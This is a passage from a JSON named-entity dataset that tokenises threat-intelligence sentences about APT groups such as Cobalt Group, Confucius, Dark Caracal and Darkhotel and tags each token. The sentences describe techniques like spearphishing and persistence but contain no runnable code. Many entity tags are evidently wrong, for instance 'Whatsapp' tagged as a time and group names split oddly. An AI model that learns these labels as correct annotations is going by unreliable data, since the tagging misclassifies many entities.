"B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Group", + "has", + "sent", + "emails", + "with", + "URLs", + "pointing", + "to", + "malicious", + "documents." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Group", + "has", + "obtained", + "and", + "used", + "a", + "variety", + "of", + "tools", + "including", + "Mimikatz,", + "PsExec,", + "Cobalt", + "Strike,", + "and", + "SDelete." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "B-Tool", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Cobalt", + "Group", + "has", + "sent", + "Word", + "OLE", + "compound", + "documents", + "with", + "malicious", + "obfuscated", + "VBA", + "macros", + "that", + "will", + "run", + "upon", + "user", + "execution." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Group", + "has", + "used", + "HTTPS", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Group", + "has", + "used", + "a", + "JavaScript", + "backdoor", + "that", + "is", + "capable", + "of", + "launching", + "cmd.exe", + "to", + "execute", + "shell", + "commands.", + "The", + "group", + "has", + "used", + "an", + "exploit", + "toolkit", + "known", + "as", + "Threadkit", + "that", + "launches", + ".bat", + "files." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Group", + "has", + "created", + "new", + "services", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Group", + "used", + "msxsl.exe", + "to", + "bypass", + "AppLocker", + "and", + "to", + "invoke", + "Jscript", + "code", + "from", + "an", + "XSL", + "file." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Confucius", + "has", + "used", + "a", + "file", + "stealer", + "to", + "steal", + "documents", + "and", + "images", + "with", + "the", + "following", + "extensions:", + "txt,", + "pdf,", + "png,", + "jpg,", + "doc,", + "xls,", + "xlm,", + "odp,", + "ods,", + "odt,", + "rtf,", + "ppt,", + "xlsx,", + "xlsm,", + "docx,", + "pptx,", + "and", + "jpeg." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Confucius", + "has", + "exfiltrated", + "stolen", + "files", + "to", + "its", + "C2", + "server." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Confucius", + "has", + "exfiltrated", + "victim", + "data", + "to", + "cloud", + "storage", + "service", + "accounts." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Confucius", + "has", + "exploited", + "Microsoft", + "Office", + "vulnerabilities,", + "including", + "CVE-2015-1641,", + "CVE-2017-11882,", + "and", + "CVE-2018-0802." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Exp", + "I-Exp", + "O", + "O", + "B-Features", + "B-Features", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "Confucius", + "has", + "used", + "a", + "file", + "stealer", + "that", + "checks", + "the", + "Document,", + "Downloads,", + "Desktop,", + "and", + "Picture", + "folders", + "for", + "documents", + "and", + "images", + "with", + "specific", + "extensions." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "B-Features", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Confucius", + "has", + "downloaded", + "additional", + "files", + "and", + "payloads", + "onto", + "a", + "compromised", + "host", + "following", + "initial", + "access." + ], + "ner_tags": [ + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Confucius", + "has", + "lured", + "victims", + "to", + "execute", + "malicious", + "attachments", + "included", + "in", + "crafted", + "spearphishing", + "emails", + "related", + "to", + "current", + "topics." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Confucius", + "has", + "lured", + "victims", + "into", + "clicking", + "on", + "a", + "malicious", + "link", + "sent", + "through", + "spearphishing." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Confucius", + "has", + "used", + "mshta.exe", + "to", + "execute", + "malicious", + "VBScript." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Confucius", + "has", + "used", + "PowerShell", + "to", + "execute", + "malicious", + "files", + "and", + "payloads." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Confucius", + "has", + "dropped", + "malicious", + "files", + "into", + "the", + "startup", + "folder", + "`%AppData%\\Microsoft\\Windows\\Start", + "Menu\\Programs\\Startup`", + "on", + "a", + "compromised", + "host", + "in", + "order", + "to", + "maintain", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Confucius", + "has", + "created", + "scheduled", + "tasks", + "to", + "maintain", + "persistence", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Confucius", + "has", + "crafted", + "and", + "sent", + "victims", + "malicious", + "attachments", + "to", + "gain", + "initial", + "access." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SecTeam", + "O", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Confucius", + "has", + "sent", + "malicious", + "links", + "to", + "victims", + "through", + "email", + "campaigns." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-OffAct", + "O" + ] + }, + { + "tokens": [ + "Confucius", + "has", + "used", + "a", + "file", + "stealer", + "that", + "can", + "examine", + "system", + "drives,", + "including", + "those", + "other", + "than", + "the", + "C", + "drive." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Confucius", + "has", + "used", + "a", + "weaponized", + "Microsoft", + "Word", + "document", + "with", + "an", + "embedded", + "RTF", + "exploit." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "I-SamFile", + "I-SamFile", + "I-SamFile", + "O", + "O", + "O", + "B-Features", + "B-Exp" + ] + }, + { + "tokens": [ + "Confucius", + "has", + "used", + "VBScript", + "to", + "execute", + "malicious", + "code." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Confucius", + "has", + "used", + "HTTP", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Confucius", + "has", + "obtained", + "cloud", + "storage", + "service", + "accounts", + "to", + "host", + "stolen", + "data." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Purp", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CopyKittens", + "encrypts", + "data", + "with", + "a", + "substitute", + "cipher", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CopyKittens", + "uses", + "ZPP,", + "a", + ".NET", + "console", + "program,", + "to", + "compress", + "files", + "with", + "ZIP." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CopyKittens", + "digitally", + "signed", + "an", + "executable", + "with", + "a", + "stolen", + "certificate", + "from", + "legitimate", + "company", + "AI", + "Squared." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SecTeam" + ] + }, + { + "tokens": [ + "CopyKittens", + "has", + "used", + "<code>-w", + "hidden</code>", + "and", + "<code>-windowstyle", + "hidden</code>", + "to", + "conceal", + "PowerShell", + "windows." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "CopyKittens", + "has", + "used", + "PowerShell", + "Empire." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "CopyKittens", + "has", + "used", + "the", + "AirVPN", + "service", + "for", + "operational", + "activity." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "B-OffAct" + ] + }, + { + "tokens": [ + "CopyKittens", + "uses", + "rundll32", + "to", + "load", + "various", + "tools", + "on", + "victims,", + "including", + "a", + "lateral", + "movement", + "tool", + "named", + "Vminst,", + "Cobalt", + "Strike,", + "and", + "shellcode." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Tool", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "CopyKittens", + "has", + "used", + "Metasploit,", + "Empire,", + "and", + "AirVPN", + "for", + "post-exploitation", + "activities." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "B-Way", + "O", + "B-Org", + "B-OffAct" + ] + }, + { + "tokens": [ + "Dark", + "Caracal", + "leveraged", + "a", + "compiled", + "HTML", + "file", + "that", + "contained", + "a", + "command", + "to", + "download", + "and", + "run", + "an", + "executable." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dark", + "Caracal", + "collected", + "complete", + "contents", + "of", + "the", + "'Pictures'", + "folder", + "from", + "compromised", + "Windows", + "systems." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dark", + "Caracal", + "leveraged", + "a", + "watering", + "hole", + "to", + "serve", + "up", + "malicious", + "code." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dark", + "Caracal", + "has", + "obfuscated", + "strings", + "in", + "Bandook", + "by", + "base64", + "encoding,", + "and", + "then", + "encrypting", + "them." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dark", + "Caracal", + "collected", + "file", + "listings", + "of", + "all", + "default", + "Windows", + "directories." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dark", + "Caracal", + "makes", + "their", + "malware", + "look", + "like", + "Flash", + "Player,", + "Office,", + "or", + "PDF", + "documents", + "in", + "order", + "to", + "entice", + "a", + "user", + "to", + "click", + "on", + "it." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O", + "B-Tool", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dark", + "Caracal's", + "version", + "of", + "Bandook", + "adds", + "a", + "registry", + "key", + "to", + "<code>HKEY_USERS\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>", + "for", + "persistence." + ], + "ner_tags": [ + "I-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Dark", + "Caracal", + "took", + "screenshots", + "using", + "their", + "Windows", + "malware." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Dark", + "Caracal", + "has", + "used", + "UPX", + "to", + "pack", + "Bandook." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Dark", + "Caracal", + "spearphished", + "victims", + "via", + "Facebook", + "and", + "Whatsapp." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-Org", + "O", + "B-Time" + ] + }, + { + "tokens": [ + "Dark", + "Caracal's", + "version", + "of", + "Bandook", + "communicates", + "with", + "their", + "server", + "over", + "a", + "TCP", + "port", + "using", + "HTTP", + "payloads", + "Base64", + "encoded", + "and", + "suffixed", + "with", + "the", + "string", + "“&&&”." + ], + "ner_tags": [ + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dark", + "Caracal", + "has", + "used", + "macros", + "in", + "Word", + "documents", + "that", + "would", + "download", + "a", + "second", + "stage", + "if", + "executed." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "B-Tool", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkHydrus", + "used", + "Template", + "Injection", + "to", + "launch", + "an", + "authentication", + "window", + "for", + "users", + "to", + "enter", + "their", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkHydrus", + "has", + "used", + "<code>-WindowStyle", + "Hidden</code>", + "to", + "conceal", + "PowerShell", + "windows." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "DarkHydrus", + "has", + "sent", + "malware", + "that", + "required", + "users", + "to", + "hit", + "the", + "enable", + "button", + "in", + "Microsoft", + "Excel", + "to", + "allow", + "an", + ".iqy", + "file", + "to", + "be", + "downloaded." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkHydrus", + "leveraged", + "PowerShell", + "to", + "download", + "and", + "execute", + "additional", + "scripts", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkHydrus", + "has", + "sent", + "spearphishing", + "emails", + "with", + "password-protected", + "RAR", + "archives", + "containing", + "malicious", + "Excel", + "Web", + "Query", + "files", + "(.iqy).", + "The", + "group", + "has", + "also", + "sent", + "spearphishing", + "emails", + "that", + "contained", + "malicious", + "Microsoft", + "Office", + "documents", + "that", + "use", + "the", + "“attachedTemplate”", + "technique", + "to", + "load", + "a", + "template", + "from", + "a", + "remote", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkHydrus", + "used", + "an", + "open-source", + "tool,", + "Phishery,", + "to", + "inject", + "malicious", + "remote", + "template", + "URLs", + "into", + "Microsoft", + "Word", + "documents", + "and", + "then", + "sent", + "them", + "to", + "victims", + "to", + "enable", + "Forced", + "Authentication." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-SamFile", + "I-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp" + ] + }, + { + "tokens": [ + "DarkHydrus", + "has", + "obtained", + "and", + "used", + "tools", + "such", + "as", + "Mimikatz,", + "Empire,", + "and", + "Cobalt", + "Strike." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "DarkVishnya", + "used", + "brute-force", + "attack", + "to", + "obtain", + "login", + "data." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Org", + "B-OffAct", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkVishnya", + "used", + "Bash", + "Bunny,", + "Raspberry", + "Pi,", + "netbooks", + "or", + "inexpensive", + "laptops", + "to", + "connect", + "to", + "the", + "company’s", + "local", + "network." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "B-Tool", + "B-Way", + "B-Tool", + "B-Way", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkVishnya", + "performed", + "port", + "scanning", + "to", + "obtain", + "the", + "list", + "of", + "active", + "services." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkVishnya", + "scanned", + "the", + "network", + "for", + "public", + "shared", + "folders." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkVishnya", + "used", + "network", + "sniffing", + "to", + "obtain", + "login", + "data." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkVishnya", + "used", + "ports", + "5190", + "and", + "7900", + "for", + "shellcode", + "listeners,", + "and", + "4444,", + "4445,", + "31337", + "for", + "shellcode", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkVishnya", + "used", + "PowerShell", + "to", + "create", + "shellcode", + "loaders." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkVishnya", + "used", + "DameWare", + "Mini", + "Remote", + "Control", + "for", + "lateral", + "movement." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkVishnya", + "has", + "obtained", + "and", + "used", + "tools", + "such", + "as", + "Impacket,", + "Winexe,", + "and", + "PsExec." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "DarkVishnya", + "created", + "new", + "services", + "for", + "shellcode", + "loaders", + "distribution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Darkhotel", + "has", + "used", + "code-signing", + "certificates", + "on", + "its", + "malware", + "that", + "are", + "either", + "forged", + "due", + "to", + "weak", + "keys", + "or", + "stolen.", + "Darkhotel", + "has", + "also", + "stolen", + "certificates", + "and", + "signed", + "backdoors", + "and", + "downloaders", + "with", + "them." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "Darkhotel", + "has", + "decrypted", + "strings", + "and", + "imports", + "using", + "RC4", + "during", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Darkhotel", + "used", + "embedded", + "iframes", + "on", + "hotel", + "login", + "portals", + "to", + "redirect", + "selected", + "victims", + "to", + "download", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Darkhotel", + "has", + "obfuscated", + "code", + "using", + "RC4,", + "XOR,", + "and", + "RSA." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Darkhotel", + "has", + "exploited", + "Adobe", + "Flash", + "vulnerability", + "CVE-2015-8651", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Exp", + "I-Exp", + "I-Exp", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Darkhotel", + "has", + "used", + "malware", + "that", + "searched", + "for", + "files", + "with", + "specific", + "patterns." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Darkhotel", + "has", + "used", + "first-stage", + "payloads", + "that", + "download", + "additional", + "malware", + "from", + "C2", + "servers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Darkhotel", + "has", + "used", + "a", + "keylogger." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Darkhotel", + "has", + "sent", + "spearphishing", + "emails", + "in", + "an", + "attempt", + "to", + "lure", + "users", + "into", + "clicking", + "on", + "a", + "malicious", + "attachments." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Darkhotel", + "has", + "used", + "malware", + "that", + "is", + "disguised", + "as", + "a", + "Secure", + "Shell", + "(SSH)", + "tool." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Darkhotel", + "malware", + "can", + "collect", + "a", + "list", + "of", + "running", + "processes", + "on", + "a", + "system." + ], + "ner_tags": [ + "B-Way", + "B-SecTeam", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Darkhotel", + "has", + "been", + "known", + "to", + "establish", + "persistence", + "by", + "adding", + "programs", + "to", + "the", + "Run", + "Registry", + "key." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Darkhotel's", + "selective", + "infector", + "modifies", + "executables", + "stored", + "on", + "removable", + "media", + "as", + "a", + "method", + "of", + "spreading", + "across", + "computers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Darkhotel", + "has", + "searched", + "for", + "anti-malware", + "strings", + "and", + "anti-virus", + "processes", + "running", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Darkhotel", + "has", + "sent", + "spearphishing", + "emails", + "with", + "malicious", + "RAR", + "and", + ".LNK", + "attachments." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Darkhotel", + "has", + "used", + "AES-256", + "and", + "3DES", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Darkhotel", + "malware", + "has", + "used", + "a", + "series", + "of", + "checks", + "to", + "determine", + "if", + "it's", + "being", + "analyzed;", + "checks", + "include", + "the", + "length", + "of", + "executable", + "names,", + "if", + "a", + "filename", + "ends", + "with", + "<code>.Md5.exe</code>,", + "and", + "if", + "the", + "program", + "is", + "executed", + "from", + "the", + "root", + "of", + "the", + "C:\\", + "drive,", + "as", + "well", + "as", + "checks", + "for", + "sandbox-related", + "libraries." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Darkhotel", + "has", + "collected", + "the", + "hostname,", + "OS", + "version,", + "service", + "pack", + "version,", + "and", + "the", + "processor", + "architecture", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Darkhotel", + "has", + "collected", + "the", + "IP", + "address", + "and", + "network", + "adapter", + "information", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Darkhotel", + "malware", + "can", + "obtain", + "system", + "time", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Darkhotel", + "used", + "a", + "virus", + "that", + "propagates", + "by", + "infecting", + "executables", + "stored", + "on", + "shared", + "drives." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Darkhotel", + "has", + "used", + "malware", + "that", + "repeatedly", + "checks", + "the", + "mouse", + "cursor", + "position", + "to", + "determine", + "if", + "a", + "real", + "user", + "is", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Darkhotel", + "malware", + "has", + "employed", + "just-in-time", + "decryption", + "of", + "strings", + "to", + "evade", + "sandbox", + "detection." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Darkhotel", + "has", + "dropped", + 